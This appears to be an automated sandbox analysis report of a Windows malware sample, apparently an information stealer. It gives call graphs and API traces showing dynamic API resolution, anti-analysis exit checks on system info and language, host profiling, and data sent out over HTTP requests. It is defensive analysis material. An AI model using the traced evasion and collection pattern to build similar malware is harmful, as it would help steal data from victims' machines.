3e4a60 2 API calls 26630->26631 26632 3e45e6 26631->26632 26633 3e4a60 2 API calls 26632->26633 26634 3e45fc 26633->26634 26635 3e4a60 2 API calls 26634->26635 26636 3e4612 26635->26636 26637 3e4a60 2 API calls 26636->26637 26638 3e4628 26637->26638 26639 3e4a60 2 API calls 26638->26639 26640 3e463e 26639->26640 26641 3e4a60 2 API calls 26640->26641 26642 3e4657 26641->26642 26643 3e4a60 2 API calls 26642->26643 26644 3e466d 26643->26644 26645 3e4a60 2 API calls 26644->26645 26646 3e4683 26645->26646 26647 3e4a60 2 API calls 26646->26647 26648 3e4699 26647->26648 26649 3e4a60 2 API calls 26648->26649 26650 3e46af 26649->26650 26651 3e4a60 2 API calls 26650->26651 26652 3e46c5 26651->26652 26653 3e4a60 2 API calls 26652->26653 26654 3e46de 26653->26654 26655 3e4a60 2 API calls 26654->26655 26656 3e46f4 26655->26656 26657 3e4a60 2 API calls 26656->26657 26658 3e470a 26657->26658 26659 3e4a60 2 API calls 26658->26659 26660 3e4720 26659->26660 26661 3e4a60 2 API calls 26660->26661 26662 3e4736 26661->26662 26663 3e4a60 2 API calls 26662->26663 26664 3e474c 26663->26664 26665 3e4a60 2 API calls 26664->26665 26666 3e4765 26665->26666 26667 3e4a60 2 API calls 26666->26667 26668 3e477b 26667->26668 26669 3e4a60 2 API calls 26668->26669 26670 3e4791 26669->26670 26671 3e4a60 2 API calls 26670->26671 26672 3e47a7 26671->26672 26673 3e4a60 2 API calls 26672->26673 26674 3e47bd 26673->26674 26675 3e4a60 2 API calls 26674->26675 26676 3e47d3 26675->26676 26677 3e4a60 2 API calls 26676->26677 26678 3e47ec 26677->26678 26679 3e4a60 2 API calls 26678->26679 26680 3e4802 26679->26680 26681 3e4a60 2 API calls 26680->26681 26682 3e4818 26681->26682 26683 3e4a60 2 API calls 26682->26683 26684 3e482e 26683->26684 26685 3e4a60 2 API calls 26684->26685 26686 3e4844 26685->26686 26687 3e4a60 2 API calls 26686->26687 26688 3e485a 26687->26688 26689 3e4a60 2 API calls 26688->26689 26690 3e4873 26689->26690 26691 3e4a60 2 API calls 26690->26691 26692 3e4889 26691->26692 26693 3e4a60 2 API calls 26692->26693 26694 3e489f 26693->26694 26695 3e4a60 2 API calls 26694->26695 26696 3e48b5 26695->26696 26697 3e4a60 2 API calls 26696->26697 26698 3e48cb 26697->26698 26699 3e4a60 2 API calls 26698->26699 26700 3e48e1 26699->26700 26701 3e4a60 2 API calls 26700->26701 26702 3e48fa 26701->26702 26703 3e4a60 2 API calls 26702->26703 26704 3e4910 26703->26704 26705 3e4a60 2 API calls 26704->26705 26706 3e4926 26705->26706 26707 3e4a60 2 API calls 26706->26707 26708 3e493c 26707->26708 26709 3e4a60 2 API calls 26708->26709 26710 3e4952 26709->26710 26711 3e4a60 2 API calls 26710->26711 26712 3e4968 26711->26712 26713 3e4a60 2 API calls 26712->26713 26714 3e4981 26713->26714 26715 3e4a60 2 API calls 26714->26715 26716 3e4997 26715->26716 26717 3e4a60 2 API calls 26716->26717 26718 3e49ad 26717->26718 26719 3e4a60 2 API calls 26718->26719 26720 3e49c3 26719->26720 26721 3e4a60 2 API calls 26720->26721 26722 3e49d9 26721->26722 26723 3e4a60 2 API calls 26722->26723 26724 3e49ef 26723->26724 26725 3e4a60 2 API calls 26724->26725 26726 3e4a08 26725->26726 26727 3e4a60 2 API calls 26726->26727 26728 3e4a1e 26727->26728 26729 3e4a60 2 API calls 26728->26729 26730 3e4a34 26729->26730 26731 3e4a60 2 API calls 26730->26731 26732 3e4a4a 26731->26732 26733 4066e0 26732->26733 26734 4066ed 43 API calls 26733->26734 26735 406afe 8 API calls 26733->26735 26734->26735 26736 406b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26735->26736 26737 406c08 26735->26737 26736->26737 26738 406cd2 26737->26738 26739 406c15 8 API calls 26737->26739 26740 406cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26738->26740 26741 406d4f 26738->26741 26739->26738 26740->26741 26742 406de9 26741->26742 26743 406d5c 6 API calls 26741->26743 26744 406f10 26742->26744 26745 406df6 12 API calls 26742->26745 26743->26742 26746 406f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26744->26746 26747 406f8d 26744->26747 26745->26744 26746->26747 26748 406fc1 26747->26748 26749 406f96 GetProcAddress GetProcAddress 26747->26749 26750 406ff5 26748->26750 26751 406fca GetProcAddress GetProcAddress 26748->26751 26749->26748 26752 407002 10 API calls 26750->26752 26753 4070ed 26750->26753 26751->26750 26752->26753 26754 407152 26753->26754 26755 4070f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26753->26755 26756 40715b GetProcAddress 26754->26756 26757 40716e 26754->26757 26755->26754 26756->26757 26758 40051f 26757->26758 26759 407177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26757->26759 26760 3e1530 26758->26760 26759->26758 27069 3e1610 26760->27069 26762 3e153b 26763 3e1555 lstrcpy 26762->26763 26764 3e155d 26762->26764 26763->26764 26765 3e1577 lstrcpy 26764->26765 26766 3e157f 26764->26766 26765->26766 26767 3e1599 lstrcpy 26766->26767 26768 3e15a1 26766->26768 26767->26768 26769 3e1605 26768->26769 26770 3e15fd lstrcpy 26768->26770 26771 3ff1b0 lstrlen 26769->26771 26770->26769 26772 3ff1e4 26771->26772 26773 3ff1eb lstrcpy 26772->26773 26774 3ff1f7 lstrlen 26772->26774 26773->26774 26775 3ff208 26774->26775 26776 3ff20f lstrcpy 26775->26776 26777 3ff21b lstrlen 26775->26777 26776->26777 26778 3ff22c 26777->26778 26779 3ff233 lstrcpy 26778->26779 26780 3ff23f 26778->26780 26779->26780 26781 3ff258 lstrcpy 26780->26781 26782 3ff264 26780->26782 26781->26782 26783 3ff286 lstrcpy 26782->26783 26784 3ff292 26782->26784 26783->26784 26785 3ff2ba lstrcpy 26784->26785 26786 3ff2c6 26784->26786 26785->26786 26787 3ff2ea lstrcpy 26786->26787 26837 3ff300 26786->26837 26787->26837 26788 3ff30c lstrlen 26788->26837 26789 3ff4b9 lstrcpy 26789->26837 26790 3ff3a1 lstrcpy 26790->26837 26791 3ff3c5 lstrcpy 26791->26837 26792 3ff4e8 lstrcpy 26854 3ff4f0 26792->26854 26793 3e1530 8 API calls 26793->26854 26794 3fee90 28 API calls 26794->26837 26795 3ff479 lstrcpy 26795->26837 26796 3ff59c lstrcpy 26796->26854 26797 3ff70f StrCmpCA 26802 3ffe8e 26797->26802 26797->26837 26798 3ff616 StrCmpCA 26798->26797 26798->26854 26799 3ffa29 StrCmpCA 26808 3ffe2b 26799->26808 26799->26837 26800 3ff73e lstrlen 26800->26837 26801 3ffead lstrlen 26815 3ffec7 26801->26815 26802->26801 26804 3ffea5 lstrcpy 26802->26804 26803 3ffd4d StrCmpCA 26805 3ffd60 Sleep 26803->26805 26812 3ffd75 26803->26812 26804->26801 26805->26837 26806 3ffa58 lstrlen 26806->26837 26807 3ff64a lstrcpy 26807->26854 26809 3ffe4a lstrlen 26808->26809 26810 3ffe42 lstrcpy 26808->26810 26821 3ffe64 26809->26821 26810->26809 26811 3ff89e lstrcpy 26811->26837 26813 3ffd94 lstrlen 26812->26813 26817 3ffd8c lstrcpy 26812->26817 26823 3ffdae 26813->26823 26814 3ff76f lstrcpy 26814->26837 26816 3ffee7 lstrlen 26815->26816 26819 3ffedf lstrcpy 26815->26819 26829 3fff01 26816->26829 26817->26813 26818 3ffbb8 lstrcpy 26818->26837 26819->26816 26820 3ffa89 lstrcpy 26820->26837 26822 3ffdce lstrlen 26821->26822 26824 3ffe7c lstrcpy 26821->26824 26838 3ffde8 26822->26838 26823->26822 26834 3ffdc6 lstrcpy 26823->26834 26824->26822 26825 3ff791 lstrcpy 26825->26837 26827 3e1530 8 API calls 26827->26837 26828 3ff8cd lstrcpy 26828->26854 26830 3fff21 26829->26830 26836 3fff19 lstrcpy 26829->26836 26831 3e1610 4 API calls 26830->26831 26855 3ffe13 26831->26855 26832 3ffaab lstrcpy 26832->26837 26833 3ff698 lstrcpy 26833->26854 26834->26822 26835 3ffbe7 lstrcpy 26835->26854 26836->26830 26837->26788 26837->26789 26837->26790 26837->26791 26837->26792 26837->26794 26837->26795 26837->26797 26837->26799 26837->26800 26837->26803 26837->26806 26837->26811 26837->26814 26837->26818 26837->26820 26837->26825 26837->26827 26837->26828 26837->26832 26837->26835 26843 3ff7e2 lstrcpy 26837->26843 26846 3ffafc lstrcpy 26837->26846 26837->26854 26839 3ffe08 26838->26839 26841 3ffe00 lstrcpy 26838->26841 26842 3e1610 4 API calls 26839->26842 26840 3fefb0 35 API calls 26840->26854 26841->26839 26842->26855 26843->26837 26844 3ff924 lstrcpy 26844->26854 26845 3ff99e StrCmpCA 26845->26799 26845->26854 26846->26837 26847 3ffc3e lstrcpy 26847->26854 26848 3ffcb8 StrCmpCA 26848->26803 26848->26854 26849 3ff9cb lstrcpy 26849->26854 26850 3ffce9 lstrcpy 26850->26854 26851 3fee90 28 API calls 26851->26854 26852 3ffa19 lstrcpy 26852->26854 26853 3ffd3a lstrcpy 26853->26854 26854->26793 26854->26796 26854->26798 26854->26799 26854->26803 26854->26807 26854->26833 26854->26837 26854->26840 26854->26844 26854->26845 26854->26847 26854->26848 26854->26849 26854->26850 26854->26851 26854->26852 26854->26853 26855->25879 26857 402785 26856->26857 26858 40278c GetVolumeInformationA 26856->26858 26857->26858 26859 4027ec GetProcessHeap RtlAllocateHeap 26858->26859 26861 402822 26859->26861 26862 402826 wsprintfA 26859->26862 27079 4071e0 26861->27079 26862->26861 26866 3e4c70 26865->26866 26867 3e4c85 26866->26867 26868 3e4c7d lstrcpy 26866->26868 27083 3e4bc0 26867->27083 26868->26867 26870 3e4c90 26871 3e4ccc lstrcpy 26870->26871 26872 3e4cd8 26870->26872 26871->26872 26873 3e4cff lstrcpy 26872->26873 26874 3e4d0b 26872->26874 26873->26874 26875 3e4d2f lstrcpy 26874->26875 26876 3e4d3b 26874->26876 26875->26876 26877 3e4d6d lstrcpy 26876->26877 26878 3e4d79 26876->26878 26877->26878 26879 3e4dac InternetOpenA StrCmpCA 26878->26879 26880 3e4da0 lstrcpy 26878->26880 26881 3e4de0 26879->26881 26880->26879 26882 3e54b8 InternetCloseHandle CryptStringToBinaryA 26881->26882 27087 403e70 26881->27087 26884 3e54e8 LocalAlloc 26882->26884 26899 3e55d8 26882->26899 26885 3e54ff CryptStringToBinaryA 26884->26885 26884->26899 26886 3e5529 lstrlen 26885->26886 26887 3e5517 LocalFree 26885->26887 26888 3e553d 26886->26888 26887->26899 26890 3e5557 lstrcpy 26888->26890 26891 3e5563 lstrlen 26888->26891 26889 3e4dfa 26892 3e4e23 lstrcpy lstrcat 26889->26892 26893 3e4e38 26889->26893 26890->26891 26895 3e557d 26891->26895 26892->26893 26894 3e4e5a lstrcpy 26893->26894 26896 3e4e62 26893->26896 26894->26896 26897 3e558f lstrcpy lstrcat 26895->26897 26898 3e55a2 26895->26898 26900 3e4e71 lstrlen 26896->26900 26897->26898 26901 3e55d1 26898->26901 26903 3e55c9 lstrcpy 26898->26903 26899->25908 26902 3e4e89 26900->26902 26901->26899 26904 3e4e95 lstrcpy lstrcat 26902->26904 26905 3e4eac 26902->26905 26903->26901 26904->26905 26906 3e4ed5 26905->26906 26907 3e4ecd lstrcpy 26905->26907 26908 3e4edc lstrlen 26906->26908 26907->26906 26909 3e4ef2 26908->26909 26910 3e4efe lstrcpy lstrcat 26909->26910 26911 3e4f15 26909->26911 26910->26911 26912 3e4f36 lstrcpy 26911->26912 26913 3e4f3e 26911->26913 26912->26913 26914 3e4f65 lstrcpy lstrcat 26913->26914 26915 3e4f7b 26913->26915 26914->26915 26916 3e4fa4 26915->26916 26917 3e4f9c lstrcpy 26915->26917 26918 3e4fab lstrlen 26916->26918 26917->26916 26919 3e4fc1 26918->26919 26920 3e4fcd lstrcpy lstrcat 26919->26920 26921 3e4fe4 26919->26921 26920->26921 26922 3e500d 26921->26922 26923 3e5005 lstrcpy 26921->26923 26924 3e5014 lstrlen 26922->26924 26923->26922 26925 3e502a 26924->26925 26926 3e5036 lstrcpy lstrcat 26925->26926 26927 3e504d 26925->26927 26926->26927 26928 3e5079 26927->26928 26929 3e5071 lstrcpy 26927->26929 26930 3e5080 lstrlen 26928->26930 26929->26928 26931 3e509b 26930->26931 26932 3e50ac lstrcpy lstrcat 26931->26932 26933 3e50bc 26931->26933 26932->26933 26934 3e50da lstrcpy lstrcat 26933->26934 26935 3e50ed 26933->26935 26934->26935 26936 3e510b lstrcpy 26935->26936 26937 3e5113 26935->26937 26936->26937 26938 3e5121 InternetConnectA 26937->26938 26938->26882 26939 3e5150 HttpOpenRequestA 26938->26939 26940 3e518b 26939->26940 26941 3e54b1 InternetCloseHandle 26939->26941 27094 407310 lstrlen 26940->27094 26941->26882 26945 3e51a4 27102 4072c0 26945->27102 26948 407280 lstrcpy 26949 3e51c0 26948->26949 26950 407310 3 API calls 26949->26950 26951 3e51d5 26950->26951 26952 407280 lstrcpy 26951->26952 26953 3e51de 26952->26953 26954 407310 3 API calls 26953->26954 26955 3e51f4 26954->26955 26956 407280 lstrcpy 26955->26956 26957 3e51fd 26956->26957 26958 407310 3 API calls 26957->26958 26959 3e5213 26958->26959 26960 407280 lstrcpy 26959->26960 26961 3e521c 26960->26961 26962 407310 3 API calls 26961->26962 26963 3e5231 26962->26963 26964 407280 lstrcpy 26963->26964 26965 3e523a 26964->26965 26966 4072c0 2 API calls 26965->26966 26967 3e524d 26966->26967 26968 407280 lstrcpy 26967->26968 26969 3e5256 26968->26969 26970 407310 3 API calls 26969->26970 26971 3e526b 26970->26971 26972 407280 lstrcpy 26971->26972 26973 3e5274 26972->26973 26974 407310 3 API calls 26973->26974 26975 3e5289 26974->26975 26976 407280 lstrcpy 26975->26976 26977 3e5292 26976->26977 26978 4072c0 2 API calls 26977->26978 26979 3e52a5 26978->26979 26980 407280 lstrcpy 26979->26980 26981 3e52ae 26980->26981 26982 407310 3 API calls 26981->26982 26983 3e52c3 26982->26983 26984 407280 lstrcpy 26983->26984 26985 3e52cc 26984->26985 26986 407310 3 API calls 26985->26986 26987 3e52e2 26986->26987 26988 407280 lstrcpy 26987->26988 26989 3e52eb 26988->26989 26990 407310 3 API calls 26989->26990 26991 3e5301 26990->26991 26992 407280 lstrcpy 26991->26992 26993 3e530a 26992->26993 26994 407310 3 API calls 26993->26994 26995 3e531f 26994->26995 26996 407280 lstrcpy 26995->26996 26997 3e5328 26996->26997 26998 4072c0 2 API calls 26997->26998 26999 3e533b 26998->26999 27000 407280 lstrcpy 26999->27000 27001 3e5344 27000->27001 27002 3e537c 27001->27002 27003 3e5370 lstrcpy 27001->27003 27004 4072c0 2 API calls 27002->27004 27003->27002 27005 3e538a 27004->27005 27006 4072c0 2 API calls 27005->27006 27007 3e5397 27006->27007 27008 407280 lstrcpy 27007->27008 27009 3e53a1 27008->27009 27010 3e53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27009->27010 27011 3e549c InternetCloseHandle 27010->27011 27015 3e53f2 27010->27015 27013 3e54ae 27011->27013 27012 3e53fd lstrlen 27012->27015 27013->26941 27014 3e542e lstrcpy lstrcat 27014->27015 27015->27011 27015->27012 27015->27014 27016 3e5473 27015->27016 27017 3e546b lstrcpy 27015->27017 27018 3e547a InternetReadFile 27016->27018 27017->27016 27018->27011 27018->27015 27020 3f8cc6 ExitProcess 27019->27020 27035 3f8ccd 27019->27035 27021 3f8ee2 27021->25910 27022 3f8dbd StrCmpCA 27022->27035 27023 3f8ddd StrCmpCA 27023->27035 27024 3f8dfd StrCmpCA 27024->27035 27025 3f8e1d StrCmpCA 27025->27035 27026 3f8e3d StrCmpCA 27026->27035 27027 3f8d5a lstrlen 27027->27035 27028 3f8e56 StrCmpCA 27028->27035 27029 3f8d30 lstrlen 27029->27035 27030 3f8e6f StrCmpCA 27030->27035 27031 3f8e88 lstrlen 27031->27035 27032 3f8d06 lstrlen 27032->27035 27033 3f8d84 StrCmpCA 27033->27035 27034 3f8da4 StrCmpCA 27034->27035 27035->27021 27035->27022 27035->27023 27035->27024 27035->27025 27035->27026 27035->27027 27035->27028 27035->27029 27035->27030 27035->27031 27035->27032 27035->27033 27035->27034 27036 3f8ebb lstrcpy 27035->27036 27036->27035 27037->25916 27038->25918 27039->25924 27040->25926 27041->25932 27042->25934 27043->25940 27044->25944 27045->25950 27046->25952 27047->25956 27048->25970 27049->25974 27050->25973 27051->25969 27052->25973 27053->25988 27054->25976 27055->25977 27056->25981 27057->25985 27058->25990 27059->25997 27060->26000 27061->26006 27062->26027 27063->26031 27064->26030 27065->26026 27066->26030 27067->26040 27070 3e161f 27069->27070 27071 3e162b lstrcpy 27070->27071 27072 3e1633 27070->27072 27071->27072 27073 3e164d lstrcpy 27072->27073 27074 3e1655 27072->27074 27073->27074 27075 3e166f lstrcpy 27074->27075 27076 3e1677 27074->27076 27075->27076 27077 3e1699 27076->27077 27078 3e1691 lstrcpy 27076->27078 27077->26762 27078->27077 27080 4071e6 27079->27080 27081 402860 27080->27081 27082 4071fc lstrcpy 27080->27082 27081->25905 27082->27081 27084 3e4bd0 27083->27084 27084->27084 27085 3e4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27084->27085 27086 3e4c41 27085->27086 27086->26870 27088 403e83 27087->27088 27089 403eab 27088->27089 27090 403e9f lstrcpy 27088->27090 27091 403ed5 GetSystemTime 27089->27091 27092 403ecd lstrcpy 27089->27092 27090->27089 27093 403ef3 27091->27093 27092->27091 27093->26889 27096 40732d 27094->27096 27095 3e519b 27098 407280 27095->27098 27096->27095 27097 40733d lstrcpy lstrcat 27096->27097 27097->27095 27100 40728c 27098->27100 27099 4072b4 27099->26945 27100->27099 27101 4072ac lstrcpy 27100->27101 27101->27099 27104 4072dc 27102->27104 27103 3e51b7 27103->26948 27104->27103 27105 4072ed lstrcpy lstrcat 27104->27105 27105->27103 27132 4031f0 GetSystemInfo wsprintfA 27119 3f8c88 16 API calls 27144 3eb309 98 API calls 27120 402880 10 API calls 27121 403480 6 API calls 27122 404480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27139 403280 7 API calls 27123 3fe0f9 140 API calls 27145 3f6b79 138 API calls 27140 3ff2f8 93 API calls 27146 3e1b64 162 API calls 27158 3ebbf9 90 API calls 27111 3f4c77 296 API calls 27112 402c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27147 409711 10 API calls __setmbcp 27136 3f1269 408 API calls 27113 3e5869 57 API calls 27129 404e35 6 API calls 27124 40749e memset ctype 27126 4030a0 GetSystemPowerStatus 27133 4029a0 GetCurrentProcess IsWow64Process 27130 3f3959 244 API calls 27134 3f01d9 126 API calls 27131 403130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27160 3f8615 48 API calls 27115 3fe049 147 API calls 27151 3f8615 49 API calls

                                  Executed Functions

                                  Function 003E4C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E4C7F
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E4CD2
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E4D05
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E4D35
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E4D73
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E4DA6
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003E4DB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: cb46ea9d38ebf41c0f7a6640a6484bd9b1e0d7d1611286f1a1795806da10b4a8
                                  • Instruction ID: d7993e93e5c38e62b573f39d96d4504714cfadcfa6ea190865f92f55645ddcd0
                                  • Opcode Fuzzy Hash: cb46ea9d38ebf41c0f7a6640a6484bd9b1e0d7d1611286f1a1795806da10b4a8
                                  • Instruction Fuzzy Hash: 5952A3319012669BCB22EFB5CC45B9F77B9AF44310F195229F805AB2D1DB74ED428BA0
                                  Function 00406390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2125 406390-4063bd GetPEB 2126 4065c3-406623 LoadLibraryA * 5 2125->2126 2127 4063c3-4065be call 4062f0 GetProcAddress * 20 2125->2127 2128 406625-406633 GetProcAddress 2126->2128 2129 406638-40663f 2126->2129 2127->2126 2128->2129 2132 406641-406667 GetProcAddress * 2 2129->2132 2133 40666c-406673 2129->2133 2132->2133 2134 406675-406683 GetProcAddress 2133->2134 2135 406688-40668f 2133->2135 2134->2135 2137 406691-40669f GetProcAddress 2135->2137 2138 4066a4-4066ab 2135->2138 2137->2138 2139 4066d7-4066da 2138->2139 2140 4066ad-4066d2 GetProcAddress * 2 2138->2140 2140->2139
                                  APIs
                                  • GetProcAddress.KERNEL32(76210000,011A17C0), ref: 004063E9
                                  • GetProcAddress.KERNEL32(76210000,011A1778), ref: 00406402
                                  • GetProcAddress.KERNEL32(76210000,011A16A0), ref: 0040641A
                                  • GetProcAddress.KERNEL32(76210000,011A16B8), ref: 00406432
                                  • GetProcAddress.KERNEL32(76210000,011A8B78), ref: 0040644B
                                  • GetProcAddress.KERNEL32(76210000,01196698), ref: 00406463
                                  • GetProcAddress.KERNEL32(76210000,01196658), ref: 0040647B
                                  • GetProcAddress.KERNEL32(76210000,011A1718), ref: 00406494
                                  • GetProcAddress.KERNEL32(76210000,011A16D0), ref: 004064AC
                                  • GetProcAddress.KERNEL32(76210000,011A17F0), ref: 004064C4
                                  • GetProcAddress.KERNEL32(76210000,011A1700), ref: 004064DD
                                  • GetProcAddress.KERNEL32(76210000,01196718), ref: 004064F5
                                  • GetProcAddress.KERNEL32(76210000,011A1748), ref: 0040650D
                                  • GetProcAddress.KERNEL32(76210000,011A15C8), ref: 00406526
                                  • GetProcAddress.KERNEL32(76210000,01196838), ref: 0040653E
                                  • GetProcAddress.KERNEL32(76210000,011A1508), ref: 00406556
                                  • GetProcAddress.KERNEL32(76210000,011A1760), ref: 0040656F
                                  • GetProcAddress.KERNEL32(76210000,01196638), ref: 00406587
                                  • GetProcAddress.KERNEL32(76210000,011A1880), ref: 0040659F
                                  • GetProcAddress.KERNEL32(76210000,011965F8), ref: 004065B8
                                  • LoadLibraryA.KERNEL32(011A1808,?,?,?,00401C03), ref: 004065C9
                                  • LoadLibraryA.KERNEL32(011A1850,?,?,?,00401C03), ref: 004065DB
                                  • LoadLibraryA.KERNEL32(011A1820,?,?,?,00401C03), ref: 004065ED
                                  • LoadLibraryA.KERNEL32(011A18B0,?,?,?,00401C03), ref: 004065FE
                                  • LoadLibraryA.KERNEL32(011A1898,?,?,?,00401C03), ref: 00406610
                                  • GetProcAddress.KERNEL32(75B30000,011A18C8), ref: 0040662D
                                  • GetProcAddress.KERNEL32(751E0000,011A1868), ref: 00406649
                                  • GetProcAddress.KERNEL32(751E0000,011A1838), ref: 00406661
                                  • GetProcAddress.KERNEL32(76910000,011A8FD0), ref: 0040667D
                                  • GetProcAddress.KERNEL32(75670000,011966B8), ref: 00406699
                                  • GetProcAddress.KERNEL32(77310000,011A8BE8), ref: 004066B5
                                  • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 004066CC
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 004066C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: d952e0c4e3c4fe0a350cb1b4c7bc2cb30e023315a21564864e78a2ebe5e47361
                                  • Instruction ID: 9e4233738dc68bddce53ef0e633477aed7236e645a54679618e30dae8974a13a
                                  • Opcode Fuzzy Hash: d952e0c4e3c4fe0a350cb1b4c7bc2cb30e023315a21564864e78a2ebe5e47361
                                  • Instruction Fuzzy Hash: FAA13DB5A112009FD754DF65ECA8AA637BBB78D746308E52FE916C3360DA34A801DB70
                                  Function 00401BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2141 401bf0-401c0b call 3e2a90 call 406390 2146 401c1a-401c27 call 3e2930 2141->2146 2147 401c0d 2141->2147 2151 401c35-401c63 2146->2151 2152 401c29-401c2f lstrcpy 2146->2152 2148 401c10-401c18 2147->2148 2148->2146 2148->2148 2156 401c65-401c67 ExitProcess 2151->2156 2157 401c6d-401c7b GetSystemInfo 2151->2157 2152->2151 2158 401c85-401ca0 call 3e1030 call 3e10c0 GetUserDefaultLangID 2157->2158 2159 401c7d-401c7f ExitProcess 2157->2159 2164 401ca2-401ca9 2158->2164 2165 401cb8-401cca call 402ad0 call 403e10 2158->2165 2164->2165 2166 401cb0-401cb2 ExitProcess 2164->2166 2171 401ce7-401d06 lstrlen call 3e2930 2165->2171 2172 401ccc-401cde call 402a40 call 403e10 2165->2172 2178 401d23-401d40 lstrlen call 3e2930 2171->2178 2179 401d08-401d0d 2171->2179 2172->2171 2185 401ce0-401ce1 ExitProcess 2172->2185 2186 401d42-401d44 2178->2186 2187 401d5a-401d7b call 402ad0 lstrlen call 3e2930 2178->2187 2179->2178 2180 401d0f-401d11 2179->2180 2180->2178 2183 401d13-401d1d lstrcpy lstrcat 2180->2183 2183->2178 